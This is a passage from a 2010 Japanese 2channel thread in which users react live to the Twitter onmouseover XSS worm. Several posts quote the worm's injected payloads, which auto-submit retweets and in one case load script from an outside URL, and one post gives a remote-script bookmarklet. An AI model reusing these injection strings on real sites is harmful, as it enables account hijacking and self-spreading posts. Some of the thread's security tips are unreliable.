10/09/21 22:37:17.35 WanWBhqPP
なんかキタ━━━(゚∀゚)━━━ !!!!!
URLリンク(imgur.com)
730: イタコ(鹿児島県)
10/09/21 22:37:25.98 7SFjtyxS0
>>726
えっ
731: 芸人(dion軍)
10/09/21 22:37:33.15 o9QAzDyfP BE:3394289478-2BP(3383)
sssp://img.2ch.net/ico/1sanmini16.gif
>>655
通報余裕でした
たしか普通に逮捕されるよ
732: パティシエ(大阪府)
10/09/21 22:37:44.33 245O/1Ve0
ログアウトってどうやるの?
733: H&K PSG-1(千葉県)
10/09/21 22:37:46.47 6/QzF+4G0
もう一回公式で見たらどっかにDM送ろうとしてたわ。
火狐とNoscriptだから未然に防がれた感じだったのかな?
面白いからほっとこう。
734: 中学生(群馬県)
10/09/21 22:37:53.64 pXkZEIiA0
>>701
あれほどTwitterは情強の集まりだって言っていたじゃないですかー!!
735: 芸人(中部地方)
10/09/21 22:37:54.27 t1QFnBW2P
>>696
JSが原因ならブラウザの種類関係なくね?
736: フードコーディネーター(青森県)
10/09/21 22:37:56.09 GZqNdWTo0
情弱芸能人探してこよう
737: 営業職(愛知県)
10/09/21 22:37:57.84 sm4sE1880
>>713
公式RTはmixiで表示されないはず
738: 花屋(埼玉県)
10/09/21 22:37:59.83 JX7U/VMs0
Firefox使ってるやつは、WindowsキーとEを3秒間同時押しでJavaScript無効に出来るよ。
739: 歴史家(北海道)
10/09/21 22:38:00.60 52Cp9PQs0
botにおやすみ言ってもらうのが毎日の楽しみだったのに
740: タコライス(アラバマ州)
10/09/21 22:38:08.95 ylzIUWvh0
>>516
その説明拡散させていいですか?
741: 絶対に許さない(静岡県)
10/09/21 22:38:16.63 AyTWuE3O0
とりあえずキャッシュ消した
742: 三角関係(大阪府)
10/09/21 22:38:21.02 rHE+ANU/0
なんか文字が消えていってというかばらばらになってくるくる回り始めたんで怖いからログアウトした
なんだったのあれ
743: 調教師(福岡県)
10/09/21 22:38:21.92 ZXdaP8m50
>>732
公式サイトからログアウトできない人へ
URLリンク(twitter.com)
このURLを打てばログアウトできるそうです
744: 軍人(福岡県)
10/09/21 22:38:27.75 nOM0Fv/E0
>>719
そのほかのファイルが消されるだろw
745: 芸人(catv?)
10/09/21 22:38:33.71 lbcQjECrP
>>709
Operaのほうが最強だというのに
火狐厨汚い
746: 司法書士(岐阜県)
10/09/21 22:38:35.79 hg8TVVWM0
>>703
こいつ犯人でそ
747: ダックワーズ(京都府)
10/09/21 22:38:39.65 O9G6ug5q0
>>722
働け
748: 韓国人(東京都)
10/09/21 22:38:41.47 0GmLUCmx0
>>729
俺もこうなってて、ツイートデックとかいう数ヶ月前にインスコして放置してた奴使ってる
すげえ使いづらい
749: 大学芋(アラバマ州)
10/09/21 22:38:49.57 4xBl64xx0
>>742
見たくなってきた
750: 講談師(関西地方)
10/09/21 22:38:59.34 n0O6bis00
>>729
それ、カーソル動かした所だけ明るくなってただろ?
751: サウンドクリエーター(東京都)
10/09/21 22:39:03.70 7W3lM9bx0
よくわからんし寝るから明日までに動画でまとめといてね、
あ、ちなみに俺つったーしてないから^^
752: 社会保険労務士(大阪府)
10/09/21 22:39:06.80 QTgITmIp0
情弱の拡散のせいでデマが広がるのはどうにかならんのか
篠崎愛引退とかも凄い勢いで広がってたよな
753: 絵本作家(catv?)
10/09/21 22:39:09.15 N9k777o3i BE:13146757-BRZ(10000)
sssp://img.2ch.net/ico/shishimai.gif
>>724
わろたw
754: 脚本家(長野県)
10/09/21 22:39:14.36 +LBpRpJH0
>>717
2週間でされるわけがない
3ヶ月放置した俺が言うんだから間違いない
755: ちんシュ大好き(関西地方)
10/09/21 22:39:23.83 YXV4xqxe0
>>725
もちろん全部吹っ飛んでたよ
彼には申し訳ないけど普通にワロタ
756: 指揮者(福岡県)
10/09/21 22:39:24.95 QO9q3M/RP
>>710
なんかipadベータテスト募集みたいなページだった たぶん個人情報収集だろうけど
chromeのシークレットモード便利すなぁ
757: ファッションデザイナー(アラバマ州)
10/09/21 22:39:25.64 RU7T7Afs0
どっちかっていうとブラクラじゃねーの?ツイッターの性質上ウィルスみたいな挙動起こしてるけど
今の所感染してもダメージ少ないから対策されるまでログアウトしてクッキー消して糞して寝ろよ
758: 翻訳家(兵庫県)
10/09/21 22:39:31.44 6v2J6ciq0
>>665
ホントそうだわ
公式がどうにかするまで終息しないな
759: きゅう師(神奈川県)
10/09/21 22:39:52.67 rvF/2Vgw0
孫禿脂肪?
760: シャブ中(大阪府)
10/09/21 22:40:17.09 as2HE/5g0
RT @Matsta: URLリンク(t.co)"onmouseover="document.getElementById('status').value='RT Matsta';$('.status-update-form').submit();"class="modal-overlay"/
これか
761: 映画監督(東京都)
10/09/21 22:40:19.34 0moocewQ0
クロームとオペラで開いていたけどクロームの方だけで引っかかりました^^b
O最伝
762: 運輸業(茨城県)
10/09/21 22:40:25.61 eszMBXP00
>>717
9カ月放置してる人がまだ残ってるよ
763: オウム真理教信者(アラバマ州)
10/09/21 22:40:32.31 8gQHHGkW0
URLリンク(a.no)"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit();"class="modal-overlay"/
764: 芸人(dion軍)
10/09/21 22:40:40.37 9ZdxRi7jP
>>738
サンクスそれIEが増える裏技でしょ
765: サウンドクリエーター(東京都)
10/09/21 22:40:42.76 7W3lM9bx0
>>91
グーグルのホームペジで前やってたじゃん?
766: リセットボタン(秋田県)
10/09/21 22:40:47.17 vyUlsC2Q0
>>703
TLでこいつにRTしてるフォロワーがゴロゴロ
犯人か?
767: ホスト(アラバマ州)
10/09/21 22:40:59.06 KvffWXuP0
ツイッターに頼りすぎな社会に打撃
768: 軍人(福岡県)
10/09/21 22:41:02.78 nOM0Fv/E0
>>516
インターネットエクスプロラーってなんだよ?
769: 芸人(dion軍)
10/09/21 22:41:08.98 o9QAzDyfP BE:2182042894-2BP(3383)
sssp://img.2ch.net/ico/1sanmini16.gif
>>668
感染とかじゃないって言ってるだろ情弱
ただ脆弱なスクリプト部分ができうる範囲のことならなんでもできる
個人情報程度なら可能だろうね
あと画面キャプチャとかフォルダ内のファイルリストアップとか
770: 芸人(中部地方)
10/09/21 22:41:15.51 t1QFnBW2P
>>717
ねーよwwwww
ガセネタ乙wwwww
2週間で垢BANなわけねーだろカスwwww
771: ソーイングスタッフ(アラバマ州)
10/09/21 22:41:18.65 mYQTs1WP0
>>655
これ逮捕されんの?何の罪?
772: キリスト教信者(アラバマ州)
10/09/21 22:41:27.63 B9sf1yl/0
これが 強烈な報復 か・・・
773: ドラグノフ(石川県)
10/09/21 22:41:28.28 jsDUnOOl0
>>710
たぶん
URLリンク(t.co)"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
マウスオーバーするとフォントサイズが極大になる
URLリンク(t.co)"onmouseover="document.getElementById('status').value='RT test_nau';$('.status-update-form').submit();"style="background:red"/
マウスオーバーするとリツイート
背景が赤くなる
URLリンク(t.co)"onmouseover="document.getElementById('status').value='RT Unlevin ';$('.status-update-form').submit();"class="modal-overlay"/
マウスオーバーするとリツイート
774: サッカー審判員(山口県)
10/09/21 22:41:31.10 GlKw5ipb0
test_nau ってアカが表示されていた。
なんなのあれ。
775: コピーライター(アラバマ州)
10/09/21 22:41:33.15 C6cxLyK+0
>>767
マジでそう思ってやってるから困る
776: 馴れ合い厨(catv?)
10/09/21 22:41:50.96 FzIIud7d0
>>748
tween使え
デック使いにくいと思うなら使いやすいはず
777: フランキ・スパス15(神奈川県)
10/09/21 22:41:52.87 hGA4cMO70
以外と悪質はスクリプトはないみたいじゃん・・・今の所は
踏んだスクリプトだけ確認しておけば大丈夫だろ
778: 芸人(dion軍)
10/09/21 22:41:56.37 zF8UUprwP
URLリンク(t.co)"onmouseover="document.getElementById('status').value='RT ui_nyan';$('.status-update-form').submit();"font-size:200pt;/
URLリンク(a.no)"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
俺が見つけたのはこの二つ
779: 馴れ合い厨(北海道)
10/09/21 22:41:57.78 W9Mzjg8w0
>>758
メディアが散々煽って情弱集めたわけだからな
780: モテ男(三重県)
10/09/21 22:42:01.27 iI4xjbNS0
>>734
馴れ合いの糞情報が多いだけで
強くねーよw
781: 鉈(catv?)
10/09/21 22:42:01.76 nqZ41Yp90
SSLでtwitterやってるんだけど一部の情報しか暗号化してないんだよね?
782: 監督(福岡県)
10/09/21 22:42:05.40 RVzy7ck60
闇プログラマーの仕業か
783: 運輸業(アラバマ州)
10/09/21 22:42:07.20 YQifflkr0
>>655
死ねバーカ
784: はり師(愛知県)
10/09/21 22:42:08.49 jookn+aO0
ログインしてなきゃJAVAオンでツイッター見てもいいのか?
785: 指揮者(鹿児島県)
10/09/21 22:42:15.50 54NVynceP
operaってスクリプトブロックでもすんの?
786: 中卒(神奈川県)
10/09/21 22:42:22.71 HvuPrygc0
結局ログインしてる奴以外は関係無いのか
787: 指揮者(東京都)
10/09/21 22:42:28.83 k62NoSd/P BE:164239283-PLT(12355)
sssp://img.2ch.net/ico/16.gif
おい!安全なクライアント教えてくれ!
PCでもiPhoneでも携帯でもいいから
788: メイド(福岡県)
10/09/21 22:42:31.69 icERWXR40
>>774
>>710の2番目のスクリプトかな
789: 芸人(東京都)
10/09/21 22:42:34.40 gza+lpmHP
jsぶった切ってりゃ無問題?
790: 社員(東京都)
10/09/21 22:42:34.90 E+QV8cGP0
よくリンク張られてるの見るだけでログインしてるわけじゃいから大丈夫だよね?
791: 僧侶(東京都)
10/09/21 22:42:37.76 w0x/PD9p0
| | |_____
| | | ̄ ̄ ̄ /|
| | | / /|
| /\ | /|/|/| ドッドッドッドッドッド!!
| / / |// / /|
| / / |_|/|/|/|/| (´⌒(´⌒`)⌒`)
| / / |文|/ // / (´⌒(´祭だ!!祭だ!!`)⌒`)
|/ /. _.| ̄|/|/|/ (´⌒(´∧ ∧⌒`)`)`)⌒`)
/|\/ / / |/ / (´⌒(´(,゚Д゚ )つ `)`)
/| / / /ヽ (´⌒(´⌒ (´⌒( つ |〕 /⌒`)⌒`)
| | ̄| | |ヽ/| 遅れるな!! ( | (⌒)`)⌒`)
| | |/| |__|/. ∧__∧ ⌒`)ド し'⌒^ミ `)⌒`)ォ
| |/| |/ (´⌒(´( ´∀` )つ ド ∧__∧⌒`)
| | |/ (´⌒(´( つ/] / ォと( ・∀・ ) 突撃―!!
| |/ ( | (⌒)`) ォ ヽ[|⊂[] )`)
| / (´ ´し'⌒^ミ `)`)ォ (⌒) |
|/ .  ̄ (_)`)`)
792: 6歳小学一年生(大分県)
10/09/21 22:42:37.73 +x0CZKvs0
こっころとこっころをかさねて~
793: 高卒(鳥取県)
10/09/21 22:42:44.13 riZaghK60
今知ってよく分からないし自分のページは改善されたりしてないんだけど
これWebから更新すると危ないからもうブラウザでtwitter開くなという事か
ちーたんならセーフ?
794: 鉄パイプ(アラバマ州)
10/09/21 22:43:06.08 h2RtZeO40
@matstaを検索するとワロスwww
795: 韓国人(宮城県)
10/09/21 22:43:20.63 NjGGncLv0
何この馬鹿くさいバグ…
796: フードコーディネーター(青森県)
10/09/21 22:43:20.77 GZqNdWTo0
禿も感染したのか
797: プロデューサー(三重県)
10/09/21 22:43:21.24 TJzu4K/O0
今夜は呟きの数が減るだろうな
798: メイド(福岡県)
10/09/21 22:43:24.43 icERWXR40
>>787
Osfoora
799: 救急救命士(北海道)
10/09/21 22:43:27.48 nOJ6jdCl0 BE:7036782-2BP(0)
sssp://img.2ch.net/ico/kuma.gif
すっかりTLがついっぷる軍とtween軍に占領されてしまった
800: 馴れ合い厨(catv?)
10/09/21 22:43:32.45 FzIIud7d0
今からvirtualPC久しぶりに立ち上げて引っかかってみるか
割と面白そうだ
801: 指揮者(東京都)
10/09/21 22:43:35.80 xeSOwzXsP
>>1
【重要】 (緊急情報の為、手動で投稿します)
只今、XSSの脆弱性により、Twitter公式WebからTwitterを利用すると不本意のツイートやRTをされる可能性があります。Twitter.comを利用している方は、すぐに URLリンク(bit.ly) からログアウトして下さい。
802: 小池さん
10/09/21 22:43:44.89 GGZDi7Bf0
ツイッターって鯖弱い上にセキュリティホールばっかなの?チンチンだな
こんなの書いてるやつ居るけど合ってる?
803: 三菱電機社員(鹿児島県)
10/09/21 22:43:48.02 cW4QjOR00
t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('URLリンク(www.hellowork.go.jp)')"/
804: FR-F2(宮城県)
10/09/21 22:43:54.00 9vZdQDR30
RTを削除してjs切りました
805: 指揮者(群馬県)
10/09/21 22:44:03.20 CWbhjojfP
>>742
>>356
806: ノンフィクション作家(関西地方)
10/09/21 22:44:04.75 +iHeElTJ0
>>773
なるほど・・・サンクス
とりあえず悪戯程度の内容でこれに関しては危険性はそんなにないのか・・・
807: 児童文学作家(関西地方)
10/09/21 22:44:10.66 ljwjHxC90
これからは企業のtwitterもなんでもかんでもフォローするの止めた方がいいな。
808: 歯科医師(兵庫県)
10/09/21 22:44:40.56 CftSdbh50
水道橋博士やられたらしいね乙
809: タコス(愛知県)
10/09/21 22:44:53.04 LvCMV6Tw0
俺ツイッターのアカウント持ってないんだけど
ヲチ先のアカウントをWebで見るとやばいの?
810: MPS AA-12(愛知県)
10/09/21 22:44:55.42 kQM8dbc10
2ちゃんに脆弱性、kakikomi.txtが晒されるってなったらどうなるの?
811: フードコーディネーター(青森県)
10/09/21 22:44:58.87 GZqNdWTo0
俺は情弱なのでツイッターの会社に問い合わせしようかな。
812: 芸人(不明なsoftbank)
10/09/21 22:45:09.59 fnfaGoR+P
>>655
通報した
813: 映画監督(茨城県)
10/09/21 22:45:13.42 uwrfjPlx0
いまどきXSSとか…
814: 彫刻家(アラバマ州)
10/09/21 22:45:14.09 BeDe0tlj0
BBCでも取り上げられててワロタ
URLリンク(www.bbc.co.uk)
815: 爽健美茶(栃木県)
10/09/21 22:45:16.03 dYEG37pi0
firefoxかかった
816: 指揮者(dion軍)
10/09/21 22:45:27.72 GNxQMfGbP
>>180
jsよく知らないけど、ブラウザでexeキックしたって、実行されるのは
その参照先のPCだろ?
ワームが感染するならわかるけど・・ご存知なら解説だれかー
817: 社会保険労務士(大阪府)
10/09/21 22:45:33.17 QTgITmIp0
アドオンでecofon使うのが便利過ぎて公式を開く隙が無かった
818: 建築物環境衛生”管理”技術者(アラバマ州)
10/09/21 22:45:33.28 5QWiVvV/0
>>655
記念マキコ
819: 芸人(東京都)
10/09/21 22:45:34.85 UAqfgnb5P
こんだけ騒がれてるのに運営アナウンスしないんだな
820: 芸人(アラバマ州)
10/09/21 22:45:35.65 9HVxRQISP
自分はiPhoneの公式アプリで無傷だけど
知り合いが引っかかってて
変なの何個もリツイートしたままになってるんだが
これは本人にリツイートを削除させるしかないのかね?
821: グラウンドキーパー(東京都)
10/09/21 22:45:35.34 YOPbxu3B0
既に出てる中で一番悪質なスクリプトはどれ
822: 司法書士(岐阜県)
10/09/21 22:45:37.14 hg8TVVWM0
URLリンク(m5s.jp) 勉強になりました
823: 韓国人(宮城県)
10/09/21 22:45:51.87 NjGGncLv0
kakikomi.txtなんていちいち取っといてどうすんのかの方が気になる
824: いい男(三重県)
10/09/21 22:45:53.96 xr/AJpHl0
webでやってる奴総じて踏んでるなw
バカフォロワー共がw
825: 運輸業(茨城県)
10/09/21 22:45:56.65 eszMBXP00
>>810
ガチで死人が出るぞ
826: 消防官(アラバマ州)
10/09/21 22:46:05.28 oHXlAF8G0
なお、スクリプト作成者? の名前は Unlevin
827: 動物看護士(福島県)
10/09/21 22:46:06.59 tsxmDw7m0
>>755
笑い飛ばしてあげるしかないよね~
友達ご愁傷様
828: 美容師(広島県)
10/09/21 22:46:10.97 7OTpucvH0
モバツイだと大丈夫でPCからも使えるってホント?
829: 三角関係(大阪府)
10/09/21 22:46:15.48 rHE+ANU/0
>>810
書き込みログ保存なんてしてる奴いないからkakikomi.txtさらされても全員無被害
830: 行政官(長野県)
10/09/21 22:46:19.45 bHt/g2Mr0
JSオンでWebから見るのはマジでやめとけよ
GENOウイルス的なものに感染するかもしれんぞ
831: たこ焼き(大阪府)
10/09/21 22:46:36.98 3L6HJl1J0
もしかしてウィルス感染しちゃった?
832: 脚本家(長野県)
10/09/21 22:46:40.95 +LBpRpJH0
>>814
日本ではまだ取り上げられてないのか?
833: フードコーディネーター(青森県)
10/09/21 22:46:51.85 GZqNdWTo0
>>819
基本的に雑魚運営だろ。だいたい米国じゃ既に終わコンだし。
834: 車掌(埼玉県)
10/09/21 22:46:52.96 QDZ3siCH0
>>773
フォントサイズが極大になるやつはスクリプト切ってても大きかったぞ、そりゃスクリプトの部分じゃないしね
835: 映画監督(茨城県)
10/09/21 22:46:54.05 uwrfjPlx0
Googleからの引き抜き云々言われてるけどさ、最近のTwitterみてると
優秀な技術者はGoogleに居残ってるんじゃないかと思う
よほど居心地が良いんだなGoogleは。
836: ジャーナリスト(埼玉県)
10/09/21 22:46:53.88 BtrGP+ec0
>>810
sent.iniな
837: ソムリエ(関西地方)
10/09/21 22:46:57.06 3ZEZVU570
警告以外のRT来てたけどOperaだとなんもなかったぞ。
でもURLリンク(m5s.jp)のは普通に反応する。
もしかすると外部jsの一部のコードがOpera非対応だったのかもしれないな。
838: ホスト(山口県)
10/09/21 22:46:58.86 RtD5boVb0
kakikomi.txtに保存は何のためにあるのかわからない
839: コメディアン(東京都)
10/09/21 22:46:59.27 0weMNU7j0
情弱多すぎてこのスレワロタ
840: 指揮者(dion軍)
10/09/21 22:47:03.03 m2P8Zp9dP
わざわざログアウトしなきゃならんのか?
長いことwebでツイッターやってない俺は放置しときゃいいんだろ?
841: たこ焼き(福島県)
10/09/21 22:47:20.37 +ArwiPci0
>>816
キンタマだけじゃないならトロイとか色々あるんでないの
842: 獣医師(神奈川県)
10/09/21 22:47:21.10 wbCdw0vH0
>>838
自分が成長したか調べるため
843: 指揮者(不明なsoftbank)
10/09/21 22:47:27.98 /uj3dOA+P
kakikomiは内容自体はどうでもいいが書き込んでる板とかスレ考えるとやっぱ晒されたくないです
844: 絵本作家(埼玉県)
10/09/21 22:47:37.16 8bLLBNMz0
URLリンク(www.youtube.com)
845: 漫才師(兵庫県)
10/09/21 22:47:45.88 O5Hgc8hi0
反応しなくなりだした
846: モテ男(三重県)
10/09/21 22:47:48.47 iI4xjbNS0
>>779
集めてる奴も情弱かもな
847: 経営コンサルタント(アラバマ州)
10/09/21 22:47:49.52 Q/oEB7L20
どこの闇プログラマーだよ
848: 登山家(新潟県)
10/09/21 22:47:58.14 AvkgNvNc0
クッキーとアカウント削除して、新しいアカウントで専用のソフト使えば大丈夫かな?
849: 芸人(東京都)
10/09/21 22:47:58.17 4CUWys7TP
JS切ってもダメなの?
850: 指揮者(岡山県)
10/09/21 22:48:01.95 ewXn35NnP
>>828
本当かどうかは分からないけど↓の情報が流れてる
【重要速報】公式モバイル版も同様にXSS脆弱性が発見された模様
851: メイド(福岡県)
10/09/21 22:48:02.42 icERWXR40
>>832
URLリンク(www.itmedia.co.jp)
852: プロデューサー(三重県)
10/09/21 22:48:08.32 TJzu4K/O0
>>838
日記にきまってんだろ
853: セラピスト(東日本)
10/09/21 22:48:08.81 MLwhTsBq0
もはや悪意を持ったら何でも出来るレベルだからな
これはやばい
ふつうならシャットダウンするレベル
854: 通信士(静岡県)
10/09/21 22:48:15.18 5e0CbQLq0
javaってなんじゃらほい?って人は他でいろいろ貰ってるんじゃないの?
855: 僧侶(東京都)
10/09/21 22:48:23.73 w0x/PD9p0
アイフォンでツイッター見ると、クレカ情報抜かれるの?
856: 歯科衛生士(茨城県)
10/09/21 22:48:28.18 0j6Gv8zr0
落ち着いたっぽい?
857: 指揮者(鹿児島県)
10/09/21 22:48:28.66 54NVynceP
今日は直りそうにないからお前ら寝るぞ
858: 韓国人(宮城県)
10/09/21 22:48:38.00 NjGGncLv0
タグ1個でも仕込めればjsでやりたい放題たぁおっかない世の中になったぜ
まだconconで落ちてる方がいい
859: 指揮者(群馬県)
10/09/21 22:48:44.33 CWbhjojfP
>>854
860: 軍人(福岡県)
10/09/21 22:48:45.81 nOM0Fv/E0
鳩山とかが踏んだら面白そうなのになwww
861: 社会保険労務士(大阪府)
10/09/21 22:48:48.55 QTgITmIp0
デスブログと関係あるの?
862: 高卒(鳥取県)
10/09/21 22:48:48.68 riZaghK60
なんでこのスレを[全部]で表示したら引っかかるんだ
URLリンク(www1.axfc.net)
863: たこ焼き(アラバマ州)
10/09/21 22:48:57.24 oqL9Uryx0
javascript:(function(d,s){s=d.createElement('script');
s.type='text/javascript';s.src='URLリンク(www.rr.iij4u.or.jp)
/~kazumix/d/javascript/meltdown3.js?'+(new Date).getTime();s.charset='UTF-8';s.id='KM3';
d.body.appendChild(s);})(document)
javascriptってこれか。
これをURL打ち込むとこにコピペするとページが崩れる
864: 中卒(兵庫県)
10/09/21 22:49:10.69 P1vhx0Yj0
mixiで情報広めてるのいるけど、Tweenもアウトとか言ってんぞ
865: 救急救命士(北海道)
10/09/21 22:49:15.59 nOJ6jdCl0 BE:4398252-2BP(0)
sssp://img.2ch.net/ico/kuma.gif
>>824
ゴメンネ!
866: 僧侶(東京都)
10/09/21 22:49:17.93 w0x/PD9p0
公式はさっさとサーバー停止しろwww
867: 映画監督(茨城県)
10/09/21 22:49:20.07 uwrfjPlx0
>>858
10年以上前から指摘されてるからなぁ
868: ドラグノフ(石川県)
10/09/21 22:49:20.05 jsDUnOOl0
>>834
スタイルシートオフにしないとな
869: FR-F2(宮城県)
10/09/21 22:49:20.89 9vZdQDR30
どうせなら現在のクリップボードを書き込みっていうのをやってほしい
870: 家畜人工授精師(北海道)
10/09/21 22:49:29.29 atFE/ejW0
Matsta
↑
こいつJSのなにやってんの?詳しい人だれか教えてくれw
871: ホスト(大阪府)
10/09/21 22:49:32.71 /9kpSi/70
ほいよ URLリンク(m5s.jp)
872: モテ男(三重県)
10/09/21 22:49:40.05 iI4xjbNS0
>>802
大体合ってる
間抜けは狙われる
873: 宮大工(catv?)
10/09/21 22:49:52.02 JId+kh5r0
とりあえずこの期にfacebook登録しようぜ
外人と交流できて面白いぞ中々に
874: 仲居(東京都)
10/09/21 22:49:53.26 5gUI6+8S0
Tween の俺に隙がなかった
875: 工芸家(長野県)
10/09/21 22:49:59.63 /ojC7rIt0
ログアウトが推奨されてるのは、
アカウント情報が取得される可能性があるから?
ログインしてなくても、問題のJavascript自体は実行されるのかな
ただログインしてるほどの被害は無いと、そういうこと?
876: 指揮者(東京都)
10/09/21 22:50:00.68 cx3T5MDpP
CNNきたよ
'Mouse over' security flaw causes Twitter trouble - CNN.com
URLリンク(edition.cnn.com)
877: 大工(関西地方)
10/09/21 22:50:06.26 9JsHzDNJ0
ログインページに直接アクセスすればとりあえずはダイジョウブ?
878: 指揮者(dion軍)
10/09/21 22:50:16.70 Qsv2n+JEP
>>844
感動した、ツイッターやってくる
879: 通信士(静岡県)
10/09/21 22:50:24.57 5e0CbQLq0
>>859
なんだよぉ
880: 芸人(東京都)
10/09/21 22:50:27.38 ywc7cRDWP
tweenも駄目とかいうツイート流れてきたんだけど、問題ないよなあ?
881: 美容師(広島県)
10/09/21 22:50:30.81 7OTpucvH0
>>850
ありがとう
鎮静化するまで近づかない方がよさそうだな
882: 運輸業(アラバマ州)
10/09/21 22:50:35.42 ZVVf6Xf60
jqueryもかけてあるからエフェクトが面白いなw
883: 学芸員(東京都)
10/09/21 22:50:46.18 E1FOLRHM0
>>864
余計混乱しそうな感じだな。
javascripを仕事で使ったことのある人間以外は何も発信しない方がいい。
884: ホスト(大阪府)
10/09/21 22:50:46.44 /9kpSi/70
>>880
嘘ついてんじゃねーよカスがっていっとけばいいよ
885: たこ焼き(大阪府)
10/09/21 22:50:50.82 3L6HJl1J0
やべー クレジットカードの情報が抜かれるーーーー!
886: セラピスト(東日本)
10/09/21 22:50:51.47 MLwhTsBq0
#と@に自動でリンク張るので二重に張ってるってことか
887: パン製造技能士(dion軍)
10/09/21 22:50:53.60 r3Vfggji0
結局テキストサイト最強伝説が今だに通用するのかw
888: 鉄パイプ(アラバマ州)
10/09/21 22:50:56.62 7viTHgur0
ツイートしてて今気づいたら無職になってた・・・
XSS脆弱性って怖いな
889: 漁業(dion軍)
10/09/21 22:51:06.24 CmhjXDYO0
アレックエンパイアもやられてて笑った
890: 指揮者(不明なsoftbank)
10/09/21 22:51:08.21 2dIKCJMMP
>>815
火狐はNoscriptいれろよ
あとtwitter.comは許可するな
891: 車掌(埼玉県)
10/09/21 22:51:12.97 QDZ3siCH0
>>880
普通の脳味噌持ってたらちょっと考えるだけでも分かると思うが
892: チンカス(中国地方)
10/09/21 22:51:17.13 tDi1MC7X0
さっきまでログインしてたから、ログアウトしてクッキーも履歴もキャッシュも全部消した
Twitterのスクリプト許可取り消した
フルスキャンしてるけどMSEだからたぶん意味ないな・・・
893: 社会のゴミ(チリ)
10/09/21 22:51:18.76 uU1lmu4c0
webで開いてるけど何も問題なくて、祭りに乗った気がしなくて逆に悲しい
フォロワー2桁程度の友達いない人には関係ない話なの?
894: 指揮者(東京都)
10/09/21 22:51:23.63 cx3T5MDpP
Twitter onmouseover security vulnerability widely exploited
URLリンク(www.youtube.com)
895: ジャーナリスト(埼玉県)
10/09/21 22:51:25.30 BtrGP+ec0
>>864
犯人か
896: 通訳(catv?)
10/09/21 22:51:31.36 K6j+KPYc0
ほんとここためになるな助かったよ。
897: グラウンドキーパー(東京都)
10/09/21 22:51:35.90 YOPbxu3B0
>>880
tweenじゃスクリプト動かないだろ・・・
898: ドラグノフ(アラバマ州)
10/09/21 22:51:35.95 Tf3WhwZG0
XSS attack identified and patched. 7 minutes ago
We’ve identified and are patching a XSS attack; as always, please message @safety if you have info regarding such an exploit.
We expect the patch to be fully rolled out shortly and will update again when it is.
URLリンク(status.twitter.com)
899: SR-25(関西地方)
10/09/21 22:51:41.55 AZbNIus50
>863
URLリンク(www.rr.iij4u.or.jp)
愉快犯ハケーン
900: 社員(東京都)
10/09/21 22:51:48.94 BEyW/5l30
>>880
製作者から安全宣言出てる
URLリンク(sourceforge.jp)
901: 調教師(東京都)
10/09/21 22:51:49.72 kJBa5zb80
文字がぐるぐるする文字列ぷりーづ
自分で試したい
902: MPS AA-12(愛知県)
10/09/21 22:51:57.83 kQM8dbc10
URLリンク(www.hellowork.go.jp)
903: ネットワークエンジニア(catv?)
10/09/21 22:51:58.26 igoKkewL0
macでいいの教えろ
904: ロリコン(茨城県)
10/09/21 22:51:58.84 391TSRwa0
この機に乗じてフォローしてる女に教えるついでに声かけたぜ
905: フードコーディネーター(青森県)
10/09/21 22:51:59.31 GZqNdWTo0
手が震えてマウスオーバーを100回くらい繰り返してる老人とかいないかな
906: ソムリエ(関西地方)
10/09/21 22:52:05.78 3ZEZVU570
>>875
ログイン中でもページ開かなければ大丈夫
907: 社会保険労務士(大阪府)
10/09/21 22:52:07.20 QTgITmIp0
クレカ情報抜かれた奴がいるって聞いたんだけど
908: 空き管(山口県)
10/09/21 22:52:10.73 I5l3bMLe0
クッキー抜かれたぞコラ
909: 漁業(dion軍)
10/09/21 22:52:15.19 CmhjXDYO0
火狐でNoscriptしたはいいけど、自分のツイート消せないんだが
910: モテ男(三重県)
10/09/21 22:52:15.04 iI4xjbNS0
>>839
真性はここにはいないお
911: メイド(福岡県)
10/09/21 22:52:16.81 y0hqemg00
映画やアニメならこの裏で主人公が一生懸命
地球を危機から救おうとしているところ
912: 調教師(茨城県)
10/09/21 22:52:23.14 imSGd+6w0
2chは堅牢なセキュリティで守られてるから、Scriptコピペしても我々には被害及ばないの?
913: 珍種の魚(茨城県)
10/09/21 22:52:23.41 ktvhW38Z0
対策された?
URLリンク(status.twitter.com)
914: 理容師(秋田県)
10/09/21 22:52:24.00 OdzoAaGJ0
今ついっぷるってただみんな押し寄せてサーバーが落ちてるだけか?
915: 動物看護士(福島県)
10/09/21 22:52:25.86 tsxmDw7m0
>>857
けいおんどうすんのよ?
916: 指揮者(東京都)
10/09/21 22:52:27.65 cx3T5MDpP
YouTube - twitterの凄いことになったバグ
URLリンク(www.youtube.com)
917: タンドリーチキン(アラバマ州)
10/09/21 22:52:27.79 X2t4Dnm80
>>623
クッキー取られてもsessionを盗むだけで、パスワードを盗むものではない
だから、別にパスワード変える必要は無いよ。ログアウトすれば問題なし。
918: 獣医師(神奈川県)
10/09/21 22:52:28.46 wbCdw0vH0
はやくモペキチ動けよ
919: 馴れ合い厨(岡山県)
10/09/21 22:52:29.95 TLPn1Vum0
web経由がダメなんだな
tweenってAPIだっけか
920: FR-F1(広島県)
10/09/21 22:52:32.88 G+Ngtw6N0
twitterバカにしてたν速民がこんなに利用してるのが驚きだわ
921: 歯科医師(埼玉県)
10/09/21 22:52:43.08 wpF2RnBD0
どこの国の仕業?
922: ワルサーWA2000(栃木県)
10/09/21 22:52:47.20 IM4ZyPIw0
Javascriptって何?
923: 指揮者(岡山県)
10/09/21 22:52:47.79 ewXn35NnP
この騒動の中いつも通り呟いてくれるBOTこそが真の情強
924: 韓国人(宮城県)
10/09/21 22:52:55.79 NjGGncLv0
>>888
人生の脆弱性を探した方が良くないか?
925: 社会保険労務士(埼玉県)
10/09/21 22:52:56.23 WXbNQGyg0
tweenは大丈夫なのでしょうか?
926: 馴れ合い厨(岡山県)
10/09/21 22:53:27.16 TLPn1Vum0
>>903
夜フクロウ一択
軽くていいぞ
927: 韓国人(宮城県)
10/09/21 22:53:30.93 NjGGncLv0
>>925
大丈夫じゃねえよカスが
情報は錯綜した方が楽しいよな!
928: ロリコン(茨城県)
10/09/21 22:53:33.07 391TSRwa0
ついっぷるもダメとかRT流れてるけどこれデマだよな?
俺は使ってないから分からんが
929: ジャーナリスト(埼玉県)
